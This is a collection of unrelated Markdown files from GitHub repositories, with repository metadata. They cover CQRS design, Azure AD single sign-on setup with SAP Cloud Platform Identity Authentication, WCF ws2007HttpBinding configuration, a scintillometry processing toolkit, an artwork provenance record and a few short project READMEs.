977fb85416164be4bd84ff6a52cac88987944863 | 961 | md | Markdown | docs/introduction.md | jkratz55/spring-cqrs-arch | 31ec5665bde368091b79434b5eae5edeeb5c7805 | [
"Apache-2.0"
] | 23 | 2018-01-17T09:03:48.000Z | 2021-10-04T19:38:56.000Z | docs/introduction.md | jkratz55/spring-cqrs-arch | 31ec5665bde368091b79434b5eae5edeeb5c7805 | [
"Apache-2.0"
] | 7 | 2019-01-07T03:31:07.000Z | 2022-01-02T16:29:11.000Z | docs/introduction.md | jkratz55/spring-cqrs-arch | 31ec5665bde368091b79434b5eae5edeeb5c7805 | [
"Apache-2.0"
] | 11 | 2018-10-06T15:06:13.000Z | 2022-03-25T15:10:03.000Z | ---
title: Introduction
permalink: /introduction/
layout: default
description: "Presentation of the Framework"
---
# To design an application using CQRS, you need to think this way:
* *What are my use cases*: define your use cases, expressed as operations (read or write), or eventually as a sequence flow diagram per use case
* *Distinguish your write accesses*: for example, creating a new user or editing their phone number. Avoid generic operations with poor business meaning, such as CRUD (Create, Update, Delete), as much as possible. Think about what you are actually trying to update. The user's personal details? Are you toggling the email configuration flag? Obviously, every operation is a write and could be expressed as one big update method, but CQRS enforces the DDD approach: it is a rule that leads to better applications through functional design rather than technical design, and it increases productivity.
* *Start by writing your commands*: that is the easiest part (a sketch of such commands follows)
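To make the distinction concrete, here is a minimal sketch (my own illustration in Python; this framework itself targets Java/Spring, so treat it as a language-agnostic pseudo-API rather than the framework's actual classes) of commands that carry explicit business meaning instead of one generic update:

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class UpdateUserPhoneNumber:      # the intent is explicit in the name
    user_id: str
    phone_number: str

@dataclass(frozen=True)
class ToggleEmailNotifications:   # another narrow, business-meaningful write
    user_id: str
    enabled: bool

def handle(command: object) -> None:
    """Each command type gets its own handler; reads live elsewhere (CQRS)."""
    match command:
        case UpdateUserPhoneNumber(user_id=uid, phone_number=phone):
            print(f"update phone of user {uid} to {phone}")
        case ToggleEmailNotifications(user_id=uid, enabled=flag):
            print(f"email notifications for user {uid}: {flag}")

handle(UpdateUserPhoneNumber("42", "+43 512 000000"))
```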
| 64.066667 | 562 | 0.777315 | eng_Latn | 0.999378 |
977ffa311359796d1c98a96bce18f09782fe73e0 | 17,981 | md | Markdown | articles/active-directory/active-directory-saas-sap-hana-cloud-platform-identity-authentication-tutorial.md | eimajtrebor/azure-docs | 5f7145b406f91caeac7f1bef4b99af5d46927cc0 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/active-directory/active-directory-saas-sap-hana-cloud-platform-identity-authentication-tutorial.md | eimajtrebor/azure-docs | 5f7145b406f91caeac7f1bef4b99af5d46927cc0 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-10-19T20:02:24.000Z | 2020-10-19T20:02:24.000Z | articles/active-directory/active-directory-saas-sap-hana-cloud-platform-identity-authentication-tutorial.md | eimajtrebor/azure-docs | 5f7145b406f91caeac7f1bef4b99af5d46927cc0 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-09-24T21:20:47.000Z | 2020-10-20T17:45:07.000Z | ---
title: 'Tutorial: Azure Active Directory integration with SAP Cloud Platform Identity Authentication | Microsoft Docs'
description: Learn how to configure single sign-on between Azure Active Directory and SAP Cloud Platform Identity Authentication.
services: active-directory
documentationCenter: na
author: jeevansd
manager: femila
ms.reviewer: joflore
ms.assetid: 1c1320d1-7ba4-4b5f-926f-4996b44d9b5e
ms.service: active-directory
ms.workload: identity
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: article
ms.date: 09/20/2017
ms.author: jeedes
---
# Tutorial: Azure Active Directory integration with SAP Cloud Platform Identity Authentication
In this tutorial, you learn how to integrate SAP Cloud Platform Identity Authentication with Azure Active Directory (Azure AD). SAP Cloud Platform Identity Authentication is used as a proxy IdP to access SAP applications using Azure AD as the main IdP.
Integrating SAP Cloud Platform Identity Authentication with Azure AD provides you with the following benefits:
- You can control in Azure AD who has access to the SAP application.
- You can enable your users to automatically get signed on to SAP applications with single sign-on (SSO) using their Azure AD accounts.
- You can manage your accounts in one central location - the Azure portal.
If you want to know more details about SaaS app integration with Azure AD, see [what is application access and single sign-on with Azure Active Directory](active-directory-appssoaccess-whatis.md).
## Prerequisites
To configure Azure AD integration with SAP Cloud Platform Identity Authentication, you need the following items:
- An Azure AD subscription
- An SAP Cloud Platform Identity Authentication single sign-on enabled subscription
> [!NOTE]
> To test the steps in this tutorial, we do not recommend using a production environment.
To test the steps in this tutorial, you should follow these recommendations:
- Do not use your production environment, unless it is necessary.
- If you don't have an Azure AD trial environment, you can [get a one-month trial](https://azure.microsoft.com/pricing/free-trial/).
## Scenario description
In this tutorial, you test Azure AD single sign-on in a test environment.
The scenario outlined in this tutorial consists of two main building blocks:
1. Adding SAP Cloud Platform Identity Authentication from the gallery
2. Configuring and testing Azure AD single sign-on
Before diving into the technical details, it is vital to understand the concepts you're going to look at. The SAP Cloud Platform Identity Authentication and Azure Active Directory federation enables you to implement SSO across applications or services protected by AAD (as an IdP) with SAP applications and services protected by SAP Cloud Platform Identity Authentication.
Currently, SAP Cloud Platform Identity Authentication acts as a Proxy Identity Provider to SAP-applications. Azure Active Directory in turn acts as the leading Identity Provider in this setup.
The following diagram illustrates this:

With this setup, your SAP Cloud Platform Identity Authentication tenant will be configured as a trusted application in Azure Active Directory.
All SAP applications and services you want to protect this way are subsequently configured in the SAP Cloud Platform Identity Authentication management console!
This means that authorization for granting access to SAP applications and services needs to take place in SAP Cloud Platform Identity Authentication for such a setup (as opposed to configuring authorization in Azure Active Directory).
By configuring SAP Cloud Platform Identity Authentication as an application through the Azure Active Directory Marketplace, you don't need to take care of configuring the individual claims / SAML assertions and transformations needed to produce a valid authentication token for SAP applications.
>[!NOTE]
>Currently, only Web SSO has been tested by both parties. Flows needed for app-to-API or API-to-API communication should work but have not been tested yet; they will be tested as part of subsequent activities.
>
## Adding SAP Cloud Platform Identity Authentication from the gallery
To configure the integration of SAP Cloud Platform Identity Authentication into Azure AD, you need to add SAP Cloud Platform Identity Authentication from the gallery to your list of managed SaaS apps.
**To add SAP Cloud Platform Identity Authentication from the gallery, perform the following steps:**
1. In the **[Azure portal](https://portal.azure.com)**, on the left navigation panel, click **Azure Active Directory** icon.
![The Azure Active Directory button][1]
2. Navigate to **Enterprise applications**. Then go to **All applications**.
![The Enterprise applications blade][2]
3. To add a new application, click the **New application** button at the top of the dialog.
![The New application button][3]
4. In the search box, type **SAP Cloud Platform Identity Authentication**, select **SAP Cloud Platform Identity Authentication** from result panel then click **Add** button to add the application.

## Configure and test Azure AD single sign-on
In this section, you configure and test Azure AD single sign-on with SAP Cloud Platform Identity Authentication based on a test user called "Britta Simon".
For single sign-on to work, Azure AD needs to know what the counterpart user in SAP Cloud Platform Identity Authentication is to a user in Azure AD. In other words, a link relationship between an Azure AD user and the related user in SAP Cloud Platform Identity Authentication needs to be established.
In SAP Cloud Platform Identity Authentication, assign the value of the **user name** in Azure AD as the value of the **Username** to establish the link relationship.
To configure and test Azure AD single sign-on with SAP Cloud Platform Identity Authentication, you need to complete the following building blocks:
1. **[Configure Azure AD Single Sign-On](#configure-azure-ad-single-sign-on)** - to enable your users to use this feature.
2. **[Create an Azure AD test user](#create-an-azure-ad-test-user)** - to test Azure AD single sign-on with Britta Simon.
3. **[Create an SAP Cloud Platform Identity Authentication test user](#create-an-sap-cloud-platform-identity-authentication-test-user)** - to have a counterpart of Britta Simon in SAP Cloud Platform Identity Authentication that is linked to the Azure AD representation of user.
4. **[Assign the Azure AD test user](#assign-the-azure-ad-test-user)** - to enable Britta Simon to use Azure AD single sign-on.
5. **[Test single sign-on](#test-single-sign-on)** - to verify whether the configuration works.
### Configure Azure AD single sign-on
In this section, you enable Azure AD single sign-on in the Azure portal and configure single sign-on in your SAP Cloud Platform Identity Authentication application.
**To configure Azure AD single sign-on with SAP Cloud Platform Identity Authentication, perform the following steps:**
1. In the Azure portal, on the **SAP Cloud Platform Identity Authentication** application integration page, click **Single sign-on**.
![Configure single sign-on link][4]
2. On the **Single sign-on** dialog, select **Mode** as **SAML-based Sign-on** to enable single sign-on.

3. On the **SAP Cloud Platform Identity Authentication Domain and URLs** section, if you wish to configure the application in **IDP** initiated mode:

In the **Identifier** textbox, type a URL using the following pattern: `https://<entity-id>.accounts.ondemand.com`
> [!NOTE]
> This value is not real. Update this value with the actual Identifier. Contact [SAP Cloud Platform Identity Authentication Client support team](https://cloudplatform.sap.com/capabilities/security/trustcenter.html) to get this value. If you don't know this value, please follow the SAP Cloud Platform Identity Authentication documentation on [Tenant SAML 2.0 Configuration](https://help.hana.ondemand.com/cloud_identity/frameset.htm?e81a19b0067f4646982d7200a8dab3ca.html).
4. Check **Show advanced URL settings**. If you wish to configure the application in **SP** initiated mode:

In the **Sign On URL** textbox, type a URL using the following pattern: `https://<entity-id>.accounts.ondemand.com/admin`
> [!NOTE]
> This value is not real. Update this value with the actual Sign-On URL. Contact [SAP Cloud Platform Identity Authentication Client support team](https://cloudplatform.sap.com/capabilities/security/trustcenter.html) to get this value.
5. On the **SAML Signing Certificate** section, click **Metadata XML** and then save the metadata file on your computer.

6. The SAP Cloud Platform Identity Authentication application expects the SAML assertions in a specific format. You can manage the values of these attributes from the "**User Attributes**" section on the application integration page. The following screenshot shows an example of this.

7. In the **User Attributes** section on the **Single sign-on** dialog, if your SAP application expects an attribute, for example "firstName", add that attribute on the SAML token attributes dialog.
a. Click **Add attribute** to open the **Add Attribute** dialog.


b. In the **Name** textbox, type the attribute name "firstName".
c. From the **Value** list, select the attribute value "user.givenname".
d. Click **Ok**.
8. Click **Save** button.

9. On the **SAP Cloud Platform Identity Authentication Configuration** section, click **Configure SAP Cloud Platform Identity Authentication** to open **Configure sign-on** window. Copy the **Sign-Out URL, SAML Entity ID, and SAML Single Sign-On Service URL** from the **Quick Reference section.**

10. To get SSO configured for your application, go to SAP Cloud Platform Identity Authentication Administration Console. The URL has the following pattern: `https://<tenant-id>.accounts.ondemand.com/admin`. Then, follow the documentation on SAP Cloud Platform Identity Authentication to [Configure Microsoft Azure AD as Corporate Identity Provider at SAP Cloud Platform Identity Authentication](https://help.hana.ondemand.com/cloud_identity/frameset.htm?626b17331b4d4014b8790d3aea70b240.html).
11. In the Azure portal, click **Save** button.
12. Continue the following steps only if you want to add and enable SSO for another SAP application. Repeat steps under the section “Adding SAP Cloud Platform Identity Authentication from the gallery” to add another instance of SAP Cloud Platform Identity Authentication.
13. In the Azure portal, on the **SAP Cloud Platform Identity Authentication** application integration page, click **Linked Sign-on**.

14. Save the configuration.
>[!NOTE]
>The new application will leverage the SSO configuration for the previous SAP application. Please make sure you use the same Corporate Identity Providers in the SAP Cloud Platform Identity Authentication Administration Console.
> [!TIP]
> You can now read a concise version of these instructions inside the [Azure portal](https://portal.azure.com), while you are setting up the app! After adding this app from the **Active Directory > Enterprise Applications** section, simply click the **Single Sign-On** tab and access the embedded documentation through the **Configuration** section at the bottom. You can read more about the embedded documentation feature here: [Azure AD embedded documentation]( https://go.microsoft.com/fwlink/?linkid=845985)
>
### Create an Azure AD test user
The objective of this section is to create a test user in the Azure portal called Britta Simon.
![Create an Azure AD test user][100]
**To create a test user in Azure AD, perform the following steps:**
1. In the Azure portal, in the left pane, click the **Azure Active Directory** button.

2. To display the list of users, go to **Users and groups**, and then click **All users**.

3. To open the **User** dialog box, click **Add** at the top of the **All Users** dialog box.

4. In the **User** dialog box, perform the following steps:

a. In the **Name** box, type **BrittaSimon**.
b. In the **User name** box, type the email address of user Britta Simon.
c. Select the **Show Password** check box, and then write down the value that's displayed in the **Password** box.
d. Click **Create**.
### Create an SAP Cloud Platform Identity Authentication test user
You don't need to create a user on SAP Cloud Platform Identity Authentication. Users who are in the Azure AD user store can use the SSO functionality.
SAP Cloud Platform Identity Authentication supports the Identity Federation option. This option allows the application to check if the users authenticated by the corporate identity provider exist in the user store of SAP Cloud Platform Identity Authentication.
In the default setting, the Identity Federation option is disabled. If Identity Federation is enabled, only the users that are imported in SAP Cloud Platform Identity Authentication are able to access the application.
For more information about how to enable or disable Identity Federation with SAP Cloud Platform Identity Authentication, see Enable Identity Federation with SAP Cloud Platform Identity Authentication in [Configure Identity Federation with the User Store of SAP Cloud Platform Identity Authentication](https://help.hana.ondemand.com/cloud_identity/frameset.htm?c029bbbaefbf4350af15115396ba14e2.html).
### Assign the Azure AD test user
In this section, you enable Britta Simon to use Azure single sign-on by granting access to SAP Cloud Platform Identity Authentication.
![Assign the user role][200]
**To assign Britta Simon to SAP Cloud Platform Identity Authentication, perform the following steps:**
1. In the Azure portal, open the applications view, and then navigate to the directory view and go to **Enterprise applications** then click **All applications**.
![Assign User][201]
2. In the applications list, select **SAP Cloud Platform Identity Authentication**.

3. In the menu on the left, click **Users and groups**.
![The "Users and groups" link][202]
4. Click **Add** button. Then select **Users and groups** on **Add Assignment** dialog.
![The Add Assignment pane][203]
5. On **Users and groups** dialog, select **Britta Simon** in the Users list.
6. Click **Select** button on **Users and groups** dialog.
7. Click **Assign** button on **Add Assignment** dialog.
### Test single sign-on
In this section, you test your Azure AD single sign-on configuration using the Access Panel.
When you click the SAP Cloud Platform Identity Authentication tile in the Access Panel, you should get automatically signed on to your SAP Cloud Platform Identity Authentication application.
For more information about the Access Panel, see [Introduction to the Access Panel](active-directory-saas-access-panel-introduction.md).
## Additional resources
* [List of Tutorials on How to Integrate SaaS Apps with Azure Active Directory](active-directory-saas-tutorial-list.md)
* [What is application access and single sign-on with Azure Active Directory?](active-directory-appssoaccess-whatis.md)
<!--Image references-->
[1]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_01.png
[2]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_02.png
[3]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_03.png
[4]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_04.png
[100]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_100.png
[200]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_200.png
[201]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_201.png
[202]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_202.png
[203]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_203.png
| 62.003448 | 512 | 0.787164 | eng_Latn | 0.923304 |
97807488e4e3648203e651a4d41d239be18c5ff2 | 241 | md | Markdown | _provenance/7327.md | brueghelfamily/brueghelfamily.github.io | a73351ac39b60cd763e483c1f8520f87d8c2a443 | [
"MIT"
] | null | null | null | _provenance/7327.md | brueghelfamily/brueghelfamily.github.io | a73351ac39b60cd763e483c1f8520f87d8c2a443 | [
"MIT"
] | null | null | null | _provenance/7327.md | brueghelfamily/brueghelfamily.github.io | a73351ac39b60cd763e483c1f8520f87d8c2a443 | [
"MIT"
] | null | null | null | ---
pid: '7327'
object_pid: '9644'
label: Three Windmills (London)
artist: janbrueghel
provenance_date: '1983'
provenance_location: Cambridge, MA
provenance_text: Gift from Woodner to Fogg Art Museum
collection: provenance
order: '2156'
---
| 20.083333 | 53 | 0.771784 | yue_Hant | 0.640467 |
97832c6f46812a0a4262afebbf9f52f5102c98bb | 3,152 | md | Markdown | README.md | gampnico/ss19-feldkurs | 63bb45bca1c97210705b8dd36489dc7d22a63c7d | [
"Apache-2.0"
] | 7 | 2020-10-19T07:48:28.000Z | 2022-01-15T01:06:26.000Z | README.md | gampnico/ss19-feldkurs | 63bb45bca1c97210705b8dd36489dc7d22a63c7d | [
"Apache-2.0"
] | null | null | null | README.md | gampnico/ss19-feldkurs | 63bb45bca1c97210705b8dd36489dc7d22a63c7d | [
"Apache-2.0"
] | 1 | 2020-11-12T09:07:25.000Z | 2020-11-12T09:07:25.000Z | # Processing Scintillometry Data in Complex Terrain
A suite of tools for computing sensible heat fluxes from the BLS450 scintillometer and working with 2D flux footprints.
This project formed part of a scintillometry field course. Due to licensing constraints, some dependencies are not satisfied by this repository alone. These are indicated below.
## 1. Features
### 1.1 Scintillometry
- Parses scintillometry data from BLS450 scintillometer.
- Processes this data and computes sensible heat fluxes.
- Processes topographical data.
- Processes InnFlux and HATPRO data.
- Produces plots of scintillometer data, path topography, and weather data.
### 1.2 Footprint Climatology
- Processes 2D flux footprints generated by Natascha Kljun's online model, available [here](http://footprint.kljun.net/).
- Makes individual topographical adjustments and stitches footprints together.
- Overlays stitched footprints onto map.
## 2. Workflow
Running scripts directly from the console will cause errors. Not all data and dependencies are available in this repository, and some of the scripts must be tailored to each individual project, notably station parameters and the times when the boundary layer switches between stable and unstable regimes.
The results of working examples are found in `Scintillometry Processing.ipynb` and `Footprint Rasters.ipynb`. The field course report and analysis are not available.
Before beginning, use [DGM 5m data](https://www.data.gv.at/katalog/dataset/digitales-gelandemodell-des-landes-salzburg-5m) to generate topographical data for the scintillometer's path coordinates. Then, use `core_path_calculator.m` to generate path transects. These are also necessary for calibrating the scintillometer.
**Scintillometer path coordinates must be accurate. Incorrectly generated topographical data leads to poor calibration and nonsense results!**
### 2.1 Scintillometry
An example of scintillometry processing can be found in `Scintillometry Processing.ipynb`.
1. Use `data_parser.py` to parse scintillometer and weather data.
2. Use `cn_derivations.data_processor()` to derive $Cn^{2}$. Make sure to enter the correct regime switch time.
3. Use `r_function_port.ward_method()`, a Python port of Helen Ward's code, to compute the Obukhov length and sensible heat flux.
4. Use the functions in `prettyplot.py` to visualise data (a rough usage sketch follows this list).
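A rough usage sketch of this workflow (my own addition: the module names come from the steps above, but the exact function signatures, arguments, and file names are assumptions and will differ from the real code):

```python
# ILLUSTRATIVE ONLY: module names are taken from the steps above, but these
# exact function signatures and file names are assumptions, not the real API.
import cn_derivations
import data_parser
import prettyplot
import r_function_port

bls = data_parser.parse("data/bls450.mnd")          # step 1 (assumed signature)
weather = data_parser.parse("data/weather.csv")
cn2 = cn_derivations.data_processor(bls, weather)   # step 2: derive Cn2
# (remember to set the correct stable/unstable regime switch time here)
fluxes = r_function_port.ward_method(cn2, weather)  # step 3: Obukhov length + SHF
prettyplot.plot_fluxes(fluxes)                      # step 4 (assumed helper)
```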
### 2.2 Path Footprint Climatology
Some example code is given in `Footprint Rasters.ipynb`, but individual adjustments are necessary.
1. Generate footprints for the entire path length, either by using the online 2D FFP tool or the FFP_clim function provided by Natascha Kljun.
2. Generate xllcenter, yllcenter coordinates for each footprint.
3. Determine the resolution and cell size of each generated footprint via the MATLAB engine for Python.
4. Calculate xllcorner, yllcorner coordinates:
> `xllcorner = xllcenter - (nrow * cellsize)/2`
5. Generate ASCII raster files, inserting the correct coordinates.
6. Generate TIFF files, apply weighting functions to each TIFF.
7. Mosaic and average TIFF files in R, generate the final contour.
8. Layer the contour plot over a map (e.g. with QGIS).
| 55.298246 | 320 | 0.796637 | eng_Latn | 0.987661 |
978369cf6d175b36b3b3cebf23a1987c8a1a22cc | 11,178 | md | Markdown | docs/framework/configure-apps/file-schema/wcf/ws2007httpbinding.md | douglasbreda/docs.pt-br | f92e63014d8313d5e283db2e213380375cea9a77 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/configure-apps/file-schema/wcf/ws2007httpbinding.md | douglasbreda/docs.pt-br | f92e63014d8313d5e283db2e213380375cea9a77 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/configure-apps/file-schema/wcf/ws2007httpbinding.md | douglasbreda/docs.pt-br | f92e63014d8313d5e283db2e213380375cea9a77 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: '<ws2007HttpBinding>'
ms.date: 03/30/2017
ms.assetid: 8586ecc9-bdaa-44d6-8d4d-7038e4ea1741
ms.openlocfilehash: 9e47bae28be6f42858fabb5b0648b60415bb5cbb
ms.sourcegitcommit: efff8f331fd9467f093f8ab8d23a203d6ecb5b60
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 09/01/2018
ms.locfileid: "43392752"
---
# <a name="ltws2007httpbindinggt"></a><ws2007HttpBinding>
Defines an interoperable binding that provides support for the correct versions of the <xref:System.ServiceModel.WSHttpBinding.Security%2A>, <xref:System.ServiceModel.ReliableSession>, and <xref:System.ServiceModel.WSHttpBindingBase.TransactionFlow%2A> binding elements.
\<system.serviceModel>
\<bindings>
\<ws2007HttpBinding>
## <a name="syntax"></a>Syntax
```xml
<ws2007HttpBinding>
<binding
allowCookies="Boolean"
bypassProxyOnLocal="Boolean"
closeTimeout="TimeSpan"
hostNameComparisonMode="StrongWildCard/Exact/WeakWildcard"
maxBufferPoolSize="integer"
maxReceivedMessageSize="Integer"
messageEncoding="Text/Mtom"
name="string"
openTimeout="TimeSpan"
proxyAddress="URI"
receiveTimeout="TimeSpan"
sendTimeout="TimeSpan"
textEncoding="UnicodeFffeTextEncoding/Utf16TextEncoding/Utf8TextEncoding"
transactionFlow="Boolean"
useDefaultWebProxy="Boolean">
<reliableSession ordered="Boolean"
inactivityTimeout="TimeSpan"
enabled="Boolean" />
<security mode="Message/None/Transport/TransportWithCredential">
<transport clientCredentialType="Basic/Certificate/Digest/None/Ntlm/Windows"
proxyCredentialType="Basic/Digest/None/Ntlm/Windows"
realm="string"
/>
<message clientCredentialType ="Certificate/IssuedToken/None/UserName/Windows"
negotiateServiceCredential="Boolean"
algorithmSuite="Basic128/Basic192/Basic256/Basic128Rsa15/Basic256Rsa15/TripleDes/TripleDesRsa15/Basic128Sha256/Basic192Sha256/TripleDesSha256/Basic128Sha256Rsa15/Basic192Sha256Rsa15/Basic256Sha256Rsa15/TripleDesSha256Rsa15"
establishSecurityContext="Boolean"
negotiateServiceCredential="Boolean"/>
</security>
<readerQuotas maxArrayLength="Integer" maxBytesPerRead="Integer" maxDepth="Integer" maxNameTableCharCount="Integer" maxStringContentLength="Integer" /> </binding>
</ws2007HttpBinding>
```
## <a name="attributes-and-elements"></a>Attributes and elements
The following sections describe attributes, child elements, and parent elements.
### <a name="attributes"></a>Attributes
|Attribute|Description|
|---------------|-----------------|
|`allowCookies`|A value that indicates whether the client accepts cookies and propagates them on future requests. The default is `false`.<br /><br /> You can use this property when you interact with ASP.NET Web Services (ASMX) that use cookies. This ensures that the cookies returned by the server are automatically copied to all future client requests for that service.|
|`bypassProxyOnLocal`|A value that indicates whether to bypass the proxy server for local addresses. The default is `false`.|
|`closeTimeout`|A <xref:System.TimeSpan> value that specifies the interval of time provided for a close operation to complete. This value must be greater than or equal to <xref:System.TimeSpan.Zero>. The default is 01:00:00.|
|`hostnameComparisonMode`|Specifies the HTTP host name comparison mode used to parse uniform resource identifiers (URIs). This attribute is of type <xref:System.ServiceModel.HostNameComparisonMode>, which indicates whether the host name is used to reach the service when matching on the URI. The default value is <xref:System.ServiceModel.HostNameComparisonMode.StrongWildcard>, which ignores the host name in the match.|
|`maxBufferPoolSize`|The maximum buffer pool size for this binding. The default is 524,288 bytes (512 × 1,024). Many parts of Windows Communication Foundation (WCF) use buffers. Creating and destroying buffers each time they are used is expensive, and garbage collection for buffers is also expensive. With buffer pools, you can take a buffer from the pool, use it, and return it to the pool once you are done. This avoids the overhead of creating and destroying buffers.|
|`maxReceivedMessageSize`|The maximum message size, in bytes, including headers, that can be received on a channel configured with this binding. The sender of a message exceeding this limit receives a SOAP fault. The receiver drops the message and creates an entry of the event in the trace log. The default is 65536.|
|`messageEncoding`|Defines the encoder used to encode the message. Valid values include the following:<br /><br /> - `Text`: Use a text message encoder.<br />- `Mtom`: Use a Message Transmission Optimization Mechanism 1.0 (MTOM) encoder.<br /><br /> The default is `Text`.<br /><br /> This attribute is of type <xref:System.ServiceModel.WSMessageEncoding>.|
|`name`|The configuration name of the binding. This value should be unique because it is used as identification for the binding. Starting with [!INCLUDE[netfx40_short](../../../../../includes/netfx40-short-md.md)], bindings and behaviors are not required to have a name. For more information about default configuration and nameless bindings and behaviors, see [Simplified Configuration](../../../../../docs/framework/wcf/simplified-configuration.md) and [Simplified Configuration for WCF Services](../../../../../docs/framework/wcf/samples/simplified-configuration-for-wcf-services.md).|
|`openTimeout`|A <xref:System.TimeSpan> value that specifies the interval of time provided for an open operation to complete. This value must be greater than or equal to <xref:System.TimeSpan.Zero>. The default is 01:00:00.|
|`proxyAddress`|A URI that specifies the address of the HTTP proxy. If `useSystemWebProxy` is `true`, this setting must be `null`. The default is `null`.|
|`receiveTimeout`|A <xref:System.TimeSpan> value that specifies the interval of time provided for a receive operation to complete. This value must be greater than or equal to <xref:System.TimeSpan.Zero>. The default is 01:00:00.|
|`sendTimeout`|A <xref:System.TimeSpan> value that specifies the interval of time provided for a send operation to complete. This value must be greater than or equal to <xref:System.TimeSpan.Zero>. The default is 01:00:00.|
|`textEncoding`|Specifies the character set encoding to be used for emitting messages on the binding. Valid values include the following:<br /><br /> - `UnicodeFffeTextEncoding`: Unicode Big Endian encoding.<br />- `Utf16TextEncoding`: 16-bit encoding.<br />- `Utf8TextEncoding`: 8-bit encoding.<br /><br /> The default is `Utf8TextEncoding`.<br /><br /> This attribute is of type <xref:System.Text.Encoding>.|
|`transactionFlow`|A value that specifies whether the binding supports flowing WS-Transactions. The default is `false`.|
|`useDefaultWebProxy`|A value that specifies whether the system's auto-configured HTTP proxy is used. The default is `true`.|
### <a name="child-elements"></a>Child elements
|Element|Description|
|-------------|-----------------|
|[\<security>](../../../../../docs/framework/configure-apps/file-schema/wcf/security-of-wshttpbinding.md)|Defines the security settings for the binding. This element is of type <xref:System.ServiceModel.Configuration.WSHttpSecurityElement>.|
|[\<readerQuotas>](https://msdn.microsoft.com/library/3e5e42ff-cef8-478f-bf14-034449239bfd)|Defines the constraints on the complexity of SOAP messages that can be processed by endpoints configured with this binding. This element is of type <xref:System.ServiceModel.Configuration.XmlDictionaryReaderQuotasElement>.|
|[reliableSession](https://msdn.microsoft.com/library/9c93818a-7dfa-43d5-b3a1-1aafccf3a00b)|Specifies whether reliable sessions are established between channel endpoints.|
### <a name="parent-elements"></a>Parent elements
|Element|Description|
|-------------|-----------------|
|[\<bindings>](../../../../../docs/framework/configure-apps/file-schema/wcf/bindings.md)|This element holds a collection of standard and custom bindings.|
## <a name="remarks"></a>Remarks
The `WS2007HttpBinding` adds a system-provided binding similar to `WSHttpBinding`, but it uses the Organization for the Advancement of Structured Information Standards (OASIS) standard versions of the TransactionFlow, ReliableSession, and Security protocols. No changes to the default settings or object model are required when using this binding.
## <a name="example"></a>Example
```xml
<configuration>
<system.ServiceModel>
<bindings>
<ws2007HttpBinding>
<binding
closeTimeout="00:00:10"
openTimeout="00:00:20"
receiveTimeout="00:00:30"
sendTimeout="00:00:40"
bypassProxyOnLocal="false"
transactionFlow="false"
hostNameComparisonMode="WeakWildcard"
maxReceivedMessageSize="1000"
messageEncoding="Mtom"
proxyAddress="http://www.contoso.com"
textEncoding="utf-16"
useDefaultWebProxy="false">
<reliableSession ordered="false"
inactivityTimeout="00:02:00"
enabled="true" />
<security mode="Transport">
<transport clientCredentialType="Digest"
proxyCredentialType="None"
realm="someRealm" />
<message clientCredentialType="Windows"
negotiateServiceCredential="false"
algorithmSuite="Aes128"
defaultProtectionLevel="None" />
</security>
</binding>
</ws2007HttpBinding>
</bindings>
</system.ServiceModel>
</configuration>
```
## <a name="see-also"></a>See also
<xref:System.ServiceModel.WS2007HttpBinding>
<xref:System.ServiceModel.Configuration.WS2007HttpBindingElement>
[Bindings](../../../../../docs/framework/wcf/bindings.md)
[Configuring System-Provided Bindings](../../../../../docs/framework/wcf/feature-details/configuring-system-provided-bindings.md)
[Using Bindings to Configure Windows Communication Foundation Services and Clients](https://msdn.microsoft.com/library/bd8b277b-932f-472f-a42a-b02bb5257dfb)
[\<binding>](../../../../../docs/framework/misc/binding.md)
| 77.625 | 610 | 0.693684 | por_Latn | 0.956221 |
97839d1afb2234661d3187367cae110f31b4de73 | 176 | md | Markdown | README.md | zhoushaowen/SWMultiController | 4c579e6848f48f8a4dc0adfcdd28312c00918059 | [
"Apache-2.0"
] | 1 | 2018-04-27T08:49:25.000Z | 2018-04-27T08:49:25.000Z | README.md | zhoushaowen/SWMultiController | 4c579e6848f48f8a4dc0adfcdd28312c00918059 | [
"Apache-2.0"
] | null | null | null | README.md | zhoushaowen/SWMultiController | 4c579e6848f48f8a4dc0adfcdd28312c00918059 | [
"Apache-2.0"
] | null | null | null | # SWMultiController
可以左右滑动的多控制器,支持屏幕旋转和storyboard
#### pod 'SWMultiController'

截图 | 22 | 91 | 0.795455 | yue_Hant | 0.177242 |
97840a98000daad14a1a0baa5706db62abfd2702 | 70 | md | Markdown | scripts/README.md | yayxs/vue | 8e4d665f816ca7a59585c2151bd3588998c223a7 | [
"MIT"
] | null | null | null | scripts/README.md | yayxs/vue | 8e4d665f816ca7a59585c2151bd3588998c223a7 | [
"MIT"
] | null | null | null | scripts/README.md | yayxs/vue | 8e4d665f816ca7a59585c2151bd3588998c223a7 | [
"MIT"
] | null | null | null | 构建相关的文件
git-hooks git 钩子的目录
alias.js 别名配置
config 生成rollup配置的文件
build | 11.666667 | 20 | 0.828571 | nno_Latn | 0.171965 |
978458b4783a9ab035a4b7925243e6ddd075e7eb | 1,888 | md | Markdown | README.md | CACLD-Bhubaneswar/web-development-training | 11a9b7ac05a026f9a3b1e7e76fa511e53636fa2d | [
"MIT"
] | null | null | null | README.md | CACLD-Bhubaneswar/web-development-training | 11a9b7ac05a026f9a3b1e7e76fa511e53636fa2d | [
"MIT"
] | null | null | null | README.md | CACLD-Bhubaneswar/web-development-training | 11a9b7ac05a026f9a3b1e7e76fa511e53636fa2d | [
"MIT"
] | 1 | 2020-09-12T20:18:46.000Z | 2020-09-12T20:18:46.000Z | # CACLD Web Development Training
Course material of CACLD Web Development Training
Register for the course here: http://www.cacld.co.in
## Module 1 : Getting Started with HTML- 8 hrs
